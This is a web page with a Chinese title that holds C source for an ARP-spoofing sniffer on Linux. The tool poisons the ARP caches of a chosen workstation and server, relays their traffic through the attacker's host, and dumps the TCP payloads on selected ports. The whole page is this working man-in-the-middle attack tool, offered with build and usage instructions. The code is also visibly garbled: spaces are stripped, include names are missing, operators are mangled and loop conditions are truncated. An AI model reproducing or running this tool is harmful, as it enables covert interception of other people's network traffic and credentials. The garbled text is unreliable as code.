Arp Sniffer在linux下面的具体实现

/*============================================================================ Coder:Paris-ye Releasedon:1/9/2003 Teston:redhat9.0

Information: Thisisaarpspoofsniffer. W B M

Make: firstyoumustinstall”pcap”and”libnet” gcc-I/usr/local/include-L/usr/local/lib-osniffersniffer.c-lpcap-lnet

Usage: ./sniffer-I[Interface]-M[SelfIP]-W[WorkstationIP]-S[ServerIP]-P[port] ============================================================================*/

#include; #include; #include; #include; #include;

#defineMAXBUF 1024*4 #definePCAP_TOUT 5 #definePROMISC 0 #defineTRUE 1 #defineFALSE 0

/*EthernetprotocolID’s*/ #defineETHERTYPE_PUP0x0200/*XeroxPUP*/ #defineETHERTYPE_IP0x0800/*IP*/ #defineETHERTYPE_ARP0x0806/*Addressresolution*/ #defineETHERTYPE_REVARP0x8035/*ReverseARP*/

/*Thisstructuredefinesanethernetarpheader.*/

/*ARPprotocolopcodes.*/ #defineARPOP_REQUEST1/*ARPrequest.*/ #defineARPOP_REPLY2/*ARPreply.*/ #defineARPOP_RREQUEST3/*RARPrequest.*/ #defineARPOP_RREPLY4/*RARPreply.*/ #defineARPOP_InREQUEST8/*InARPrequest.*/ #defineARPOP_InREPLY9/*InARPreply.*/ #defineARPOP_NAK10/*(ATM)ARPNAK.*/

/*ARPprotocolHARDWAREidentifiers.*/ #defineARPHRD_NETROM0/*FromKA9Q:NET/ROMpseudo.*/ #defineARPHRD_ETHER1/*Ethernet10/100Mbps.*/ #defineARPHRD_EETHER2/*ExperimentalEthernet.*/ #defineARPHRD_AX253/*AX.25Level2.*/ #defineARPHRD_PRONET4/*PROnettokenring.*/ #defineARPHRD_CHAOS5/*Chaosnet.*/ #defineARPHRD_IEEE8026/*IEEE802.2Ethernet/TR/TB.*/ #defineARPHRD_ARCNET7/*ARCnet.*/ #defineARPHRD_APPLETLK8/*APPLEtalk.*/ #defineARPHRD_DLCI15/*FrameRelayDLCI.*/ #defineARPHRD_ATM19/*ATM.*/ #defineARPHRD_METRICOM23/*MetricomSTRIP(newIANAid).*/

/*DummytypesfornonARPhardware*/ #defineARPHRD_SLIP0x256 #defineARPHRD_CSLIP0x257 #defineARPHRD_SLIP60x258 #defineARPHRD_CSLIP60x259 #defineARPHRD_RSRVD0x260/*NotionalKISStype.*/ #defineARPHRD_ADAPT0x264 #defineARPHRD_ROSE0x270 #defineARPHRD_X250x271/*CCITTX.25.*/ #defineARPHDR_HWX250x272/*BoardswithX.25infirmware.*/ #defineARPHRD_PPP0x512 #defineARPHRD_CISCO0x513/*CiscoHDLC.*/ #defineARPHRD_HDLCARPHRD_CISCO #defineARPHRD_LAPB0x516/*LAPB.*/ #defineARPHRD_DDCMP0x517/*Digital’sDDCMP.*/ #defineARPHRD_RAWHDLC0x518/*RawHDLC.*/

#defineARPHRD_TUNNEL0x768/*IPIPtunnel.*/ #defineARPHRD_TUNNEL60x769/*IPIP6tunnel.*/ #defineARPHRD_FRAD0x770/*FrameRelayAccessDevice.*/ #defineARPHRD_SKIP0x771/*SKIPvif.*/ #defineARPHRD_LOOPBACK0x772/*Loopbackdevice.*/ #defineARPHRD_LOCALTLK0x773/*Localtalkdevice.*/ #defineARPHRD_FDDI0x774/*FiberDistributedDataInterface.*/ #defineARPHRD_BIF0x775/*AP1000BIF.*/ #defineARPHRD_SIT0x776/*sit0device-IPv6-in-IPv4.*/ #defineARPHRD_IPDDP0x777/*IP-in-DDPtunnel.*/ #defineARPHRD_IPGRE0x778/*GREoverIP.*/ #defineARPHRD_PIMREG0x779/*PIMSMregisterinterface.*/ #defineARPHRD_HIPPI0x780/*HighPerformanceParallelI’face.*/ #defineARPHRD_ASH0x781/*(NexusElectronics)Ash.*/ #defineARPHRD_ECONET0x782/*AcornEconet.*/ #defineARPHRD_IRDA0x783/*Linux-IrDA.*/ #defineARPHRD_FCPP0x784/*Pointtopointfibrechanel.*/ #defineARPHRD_FCAL0x785/*Fibrechanelarbitratedloop.*/ #defineARPHRD_FCPL0x786/*Fibrechanelpublicloop.*/ #defineARPHRD_FCPFABRIC0x787/*Fibrechanelfabric.*/ #defineARPHRD_IEEE802_TR0x800/*MagictypeidentforTR.*/ #defineARPHRD_IEEE802110x801/*IEEE802.11.*/

/*IPversionnumber*/ #defineIPVERSION4

structether_header { u_int8_tether_dhost[6];/*destinationethaddr*/ u_int8_tether_shost[6];/*sourceetheraddr*/ u_int16_tether_type;/*packettypeIDfield*/ };

structarphdr { unsignedshortintar_hrd;/*Formatofhardwareaddress.*/ unsignedshortintar_pro;/*Formatofprotocoladdress.*/ unsignedcharar_hln;/*Lengthofhardwareaddress.*/ unsignedcharar_pln;/*Lengthofprotocoladdress.*/ unsignedshortintar_op;/*ARPopcode(command).*/ unsignedchar__ar_sha[6];/*Senderhardwareaddress.*/ unsignedchar__ar_sip[4];/*SenderIPaddress.*/ unsignedchar__ar_tha[6];/*Targethardwareaddress.*/ unsignedchar__ar_tip[4];/*TargetIPaddress.*/ };

/* *Structureofaninternetheader,nakedofoptions. */ structiphead { unsignedintip_hl:4;/*headerlength*/ unsignedintip_v:4;/*version*/ u_int8_tip_tos;/*typeofservice*/ u_shortip_len;/*totallength*/ u_shortip_id;/*identification*/ u_shortip_off;/*fragmentoffsetfield*/ u_int8_tip_ttl;/*timetolive*/ u_int8_tip_p;/*protocol*/ u_shortip_sum;/*checksum*/ u_charip_src[4],ip_dst[4];/*sourceanddestaddress*/ };

structtcphead { u_int16_tth_sport;/*sourceport*/ u_int16_tth_dport;/*destinationport*/ u_int32_tth_seq;/*sequencenumber*/ u_int32_tth_ack;/*acknowledgementnumber*/ u_int8_tth_off:4;/*dataoffset*/ u_int8_tth_x2:4;/*(unused)*/ u_int8_tth_flags; #defineTH_FIN0x01 #defineTH_SYN0x02 #defineTH_RST0x04 #defineTH_PUSH0x08 #defineTH_ACK0x10 #defineTH_URG0x20 u_int16_tth_win;/*window*/ u_int16_tth_sum;/*checksum*/ u_int16_tth_urp;/*urgentpointer*/ };

/* *W,S,M’sipandmacaddress */ structipmacaddr { u_charipW[4]; u_charmacW[6]; u_charipS[4]; u_charmacS[6]; u_charipM[4]; u_charmacM[6]; }; intusage(char*argv) { printf(“====================================\n”); printf(“============ArpSniffer=============\n”); printf(“==========WritebyParis-Ye=========\n”); printf(“===Usage:%s-I[interface]-M[SelfIP]-W[WorkstationIP]-S[ServerIP]-P[port]\n”,argv); printf(“===Forexample:\n”); printf(“\t%s-Ieth0-M192.168.0.6-W192.168.0.4-S192.168.0.254\n”,argv); return0; }

/*sendarppacketfunction*/ intarpsend(libnet_t*lnet,u_char*smac,u_char*sip,u_char*dmac,u_char*dip) { int ret=0; u_char* packet; u_long packets; libnet_ptag_t t; structether_header* ethh; structarphdr* arph;

packets=sizeof(structether_header)+sizeof(structarphdr); packet=malloc(packets); ethh=(structether_header*)packet; arph=(structarphdr*)(packet+sizeof(structether_header));

memcpy(ethh->;ether_dhost,dmac,6); memcpy(ethh->;ether_shost,smac,6); ethh->;ether_type=htons(ETHERTYPE_ARP); arph->;ar_hrd=htons(ARPOP_REQUEST); arph->;ar_pro=htons(ARPHRD_IEEE802_TR); arph->;ar_hln=6; arph->;ar_pln=4; arph->;ar_op=htons(ARPHRD_ETHER); memcpy(arph->;__ar_sha,smac,6); memcpy(arph->;__ar_sip,sip,4); bzero(arph->;__ar_tha,6); memcpy(arph->;__ar_tip,dip,4); ret=libnet_write_link( lnet, packet, packets ); if(ret==-1) { returnFALSE; } returnTRUE; }

/*SendspoofarpSAndWevery6secondinterval*/ voidarpspoof(libnet_t*lnet,structipmacaddr*ipmac) { while(TRUE) { arpsend(lnet,ipmac->;macM,ipmac->;ipS,ipmac->;macW,ipmac->;ipW); arpsend(lnet,ipmac->;macM,ipmac->;ipW,ipmac->;macS,ipmac->;ipS); sleep(6); } }

/*ForwardpacketsW—>;SorS—>;W*/ intforwarddate(libnet_t*lnet,constu_char*packet,intlen,u_char*macW,u_char*macS,u_char*macM) { intret=0; constu_char*datapoint=packet; structether_header*ethhdr; structiphead*iph;

ethhdr=(structether_header*)datapoint;

if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP) returnTRUE; if(!memcmp(ethhdr->;ether_shost,macM,6))/*iftheSourceMacisagent(M)’scomeback*/ returnTRUE; if(memcmp(ethhdr->;ether_dhost,macM,6))/*iftheSourceMacDestinationis’tagent(M)’scomeback*/ returnTRUE; if(!memcmp(ethhdr->;ether_shost,macW,6))/*iftheSourceMacisW’s(Workstation)*/ { memcpy(ethhdr->;ether_shost,macM,6); memcpy(ethhdr->;ether_dhost,macS,6); ret=libnet_write_link( lnet, (u_char*)datapoint, len ); } if(!memcmp(ethhdr->;ether_shost,macS,6))/*iftheSourceMacisSS’s(server)*/ { memcpy(ethhdr->;ether_shost,macM,6); memcpy(ethhdr->;ether_dhost,macW,6); ret=libnet_write_link( lnet, (u_char*)datapoint, len ); }

returnTRUE; }

/*printhexdatetoAscii*/ voidprintdat(u_char*packet,intlen) { inti=0,j=0; u_charstr[16]; for(i=0;i { memcpy(str,packet+i,16); fprintf(stdout,”%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x”, str[0],str[1],str[2],str[3], str[4],str[5],str[6],str[7], str[8],str[9],str[10],str[11], str[12],str[13],str[14],str[15] ); for(j=0;j { if(str[j];126) str[j]=’.’; } fprintf(stdout,”%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n”, str[0],str[1],str[2],str[3], str[4],str[5],str[6],str[7], str[8],str[9],str[10],str[11], str[12],str[13],str[14],str[15] ); } if(i!=len) { memcpy(str,packet+i,16); for(j=0;j { if(j%4==0&&j!=0) fprintf(stdout,””); if((i+j) { fprintf(stdout,”%02x”,str[j]); } else fprintf(stdout,””); } fprintf(stdout,””); for(j=0;j { if((i+j) { if(str[j];126) str[j]=’.’; fprintf(stdout,”%c”,str[j]); } } fprintf(stdout,”\n\n”); } }

/*parsepacket*/ intparsedate(constu_char*packet,intlen,u_char*macW,u_char*macS,u_char*macM,u_char*ipW,u_char*ipS,int*port) { int i=0; intcontents; u_char*content; constu_char*datapoint=packet; structether_header*ethhdr; structiphead*iph; structtcphead*tcph;

ethhdr=(structether_header*)datapoint; iph=(structiphead*)(datapoint+sizeof(structether_header)); tcph=(structtcphead*)(datapoint+sizeof(structether_header)+sizeof(structiphead)); if(memcmp(ethhdr->;ether_shost,macW,6)&&memcmp(ethhdr->;ether_shost,macS,6)) returnFALSE; if(memcmp(ethhdr->;ether_dhost,macM,6)) returnFALSE; if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP) returnFALSE; if(iph->;ip_v!=4||iph->;ip_hl!=5) returnFALSE; if(!(!memcmp(iph->;ip_dst,ipW,4)||!memcmp(iph->;ip_src,ipW,4))) returnFALSE; if(iph->;ip_p!=IPPROTO_TCP) returnFALSE; contents=htons(iph->;ip_len)-sizeof(structiphead)-sizeof(structtcphead); content=(u_char*)(datapoint+sizeof(structether_header)+sizeof(structiphead)+sizeof(structtcphead)); if((tcph->;th_flags&TH_PUSH)) { for(i==0;port!=0;i++) { printf(“=====%d%d\n”,port,htons(tcph->;th_dport)); if(port==htons(tcph->;th_dport)||port==htons(tcph->;th_sport)) break; } if(port==0) return; printf(“Size:[%d][%d.%d.%d.%d:%d]->;[%d.%d.%d.%d:%d]\n”,htons(iph->;ip_len), iph->;ip_src[0],iph->;ip_src[1],iph->;ip_src[2],iph->;ip_src[3],htons(tcph->;th_sport), iph->;ip_dst[0],iph->;ip_dst[1],iph->;ip_dst[2],iph->;ip_dst[3],htons(tcph->;th_dport) ); printdat(content,contents); }

returnTRUE; }

/*Snifferpackets*/ intagentpacket(libnet_t*lnet,pcap_t*lpcap,structipmacaddr*ipmac,int*port) { constu_char*packet; structpcap_pkthdrhdr; while(1) { packet=pcap_next(lpcap,&hdr); if(packet==NULL||hdr.len==0) continue; parsedate(packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM,ipmac->;ipW,ipmac->;ipS,port); forwarddate(lnet,packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM); }

returnTRUE; }

/* WheninitializeGettheSandWMacaddress Sendarprequest */ intgettargetmac(libnet_t*lnet,structipmacaddr*ipmac) { while(1) { arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macW,ipmac->;ipW); arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macS,ipmac->;ipS); sleep(1); } returnTRUE; }

/* WheninitializeGettheSandWMacaddress parsearpreply */ intgetmacaddress(char*dev,libnet_t*lnet,pcap_t*lpcap,structipmacaddr*ipmac) { intskfd=0; unsignedintisgetmac=0x0; pid_t pid=0; structifreqifr; constu_char*packet; structpcap_pkthdrhdr; structether_header*ethhdr; structarphdr* arph;

//———-getlocalmacadrress strcpy(ifr.ifr_name,dev); skfd=socket(AF_INET,SOCK_DGRAM,0); if(skfd { printf(“Can’topensocket!\n”); returnFALSE; } if(ioctl(skfd,SIOCGIFHWADDR,&ifr) { printf(“Can’treadlocalmacaddress!\n”); returnFALSE; } memcpy(ipmac->;macM,ifr.ifr_hwaddr.sa_data,6); close(skfd); //———-gettargetmacaddress pid=fork(); if(pid==0) { gettargetmac(lnet,ipmac); exit(TRUE); } while(1) { packet=pcap_next(lpcap,&hdr); if(packet==NULL||hdr.len==0) continue; ethhdr=(structether_header*)packet; arph=(structarphdr*)(packet+sizeof(structether_header));

if(memcmp(ethhdr->;ether_dhost,ipmac->;macM,6)) continue; if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_ARP) continue; if(!memcmp(arph->;__ar_sip,ipmac->;ipW,4)&&!memcmp(arph->;__ar_tip,ipmac->;ipM,4)) { memcpy(ipmac->;macW,arph->;__ar_sha,6); isgetmac=0xFFFF0000|isgetmac; } if(!memcmp(arph->;__ar_sip,ipmac->;ipS,4)&&!memcmp(arph->;__ar_tip,ipmac->;ipM,4)) { memcpy(ipmac->;macS,arph->;__ar_sha,6); isgetmac=0x0000FFFF|isgetmac; } if(isgetmac==0xFFFFFFFF) break; } kill(pid,9); returnTRUE; }

intmain(intargc,char*argv[]) { int ret=0,i=0; char *p,*s; char c; char string[]=”I:M:W:S:P:”; int port[100]; char dev[32]=””; structipmacaddripmac; pid_t pid; libnet_t* lnet; pcap_t*lpcap; bpf_u_int32netp,maskp; structbpf_programfp; charerr[PCAP_ERRBUF_SIZE]; charfilterstr[]=””;

unsignedintipM; unsignedintipW; unsignedintipS; u_charmacW[]={255,255,255,255,255,255,255}; u_charmacS[]={255,255,255,255,255,255,255}; u_charmacM[]={255,255,255,255,255,255,255};

bzero(&ipmac,sizeof(structipmacaddr)); if(argc { usage(argv[0]); returnFALSE; } while((c=getopt(argc,argv,string))!=EOF) { switch(c) { case(‘I’): strcpy(dev,optarg); break; case(‘M’): ipM=inet_addr(optarg); memcpy(ipmac.ipM,(void*)&ipM,4); break; case(‘W’): ipW=inet_addr(optarg); memcpy(ipmac.ipW,(void*)&ipW,4); break; case(‘S’): ipS=inet_addr(optarg); memcpy(ipmac.ipS,(void*)&ipS,4); break; case(‘P’): printf(“%s\n”,optarg); s=optarg; p=strtok(s,”:”); while(p) { port=atoi(p); printf(“%d\n”,port); p=strtok(NULL,”:”); i++; } port=0;

break; default: usage(argv[0]); returnFALSE; } }

memcpy(ipmac.macW,macW,6); memcpy(ipmac.macS,macS,6); memcpy(ipmac.macM,macM,6); ret=pcap_lookupnet(dev,&netp,&maskp,err); if(ret==-1) { printf(“Can’tinitializePCAP![%s]\n”,err); returnFALSE; } lpcap=pcap_open_live( dev, MAXBUF, PROMISC, PCAP_TOUT, err ); if(lpcap==NULL) { printf(“Can’tinitializePCAP![%s]\n”,err); returnFALSE; }

ret=pcap_compile(lpcap,&fp,filterstr,0,netp); if(ret==-1) { printf(“Errorpcap_compile!\n”); returnFALSE; }

ret=pcap_setfilter(lpcap,&fp); if(ret==-1) { printf(“Errorpcap_setfilter!\n”); returnFALSE; }

lnet=libnet_init( LIBNET_LINK, dev, err); if(lnet==NULL) { printf(“Can’tinitializelibnet!Pleasecheckthe[dev]\n”); returnFALSE; }

ret=getmacaddress(dev,lnet,lpcap,&ipmac); printf(“Getnetworkcardsmacaddress:\n”); printf(“M->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macM[0],ipmac.macM[1],ipmac.macM[2],ipmac.macM[3],ipmac.macM[4],ipmac.macM[5],ipmac.macM[6]); printf(“W->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macW[0],ipmac.macW[1],ipmac.macW[2],ipmac.macW[3],ipmac.macW[4],ipmac.macW[5],ipmac.macW[6]); printf(“S->;%02x:%02x:%02x:%02x:%02x:%02x\n”,ipmac.macS[0],ipmac.macS[1],ipmac.macS[2],ipmac.macS[3],ipmac.macS[4],ipmac.macS[5],ipmac.macS[6]); printf(“\nNowStart……\n”); if(ret==FALSE) { returnFALSE; }

pid=fork(); if(pid==0) { arpspoof(lnet,&ipmac); returnFALSE; }else { agentpacket(lnet,lpcap,&ipmac,port); }

libnet_destroy(lnet); pcap_close(lpcap); printf(“Done\n”); returnTRUE; }